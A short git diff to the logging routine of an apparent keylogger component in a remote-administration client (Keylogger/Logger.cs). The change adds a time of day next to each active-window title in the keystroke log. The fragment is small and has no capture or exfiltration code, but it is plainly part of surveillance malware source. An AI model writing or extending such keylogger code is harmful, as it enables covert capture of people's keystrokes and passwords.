diff --git a/Client/Core/Keylogger/Logger.cs b/Client/Core/Keylogger/Logger.cs index c8a3f097..e2c49178 100644 --- a/Client/Core/Keylogger/Logger.cs +++ b/Client/Core/Keylogger/Logger.cs @@ -97,7 +97,10 @@ private void Unsubscribe() if (!string.IsNullOrEmpty(activeWindowTitle) && activeWindowTitle != _lastWindowTitle) { _lastWindowTitle = activeWindowTitle; - _logFileBuffer.Append(@"



[" + activeWindowTitle + "]


"); + _logFileBuffer.Append(@"



[" + + activeWindowTitle + " - " + + DateTime.Now.ToString("HH:mm") + + "]


"); } if (_pressedKeys.IsModifierKeysSet())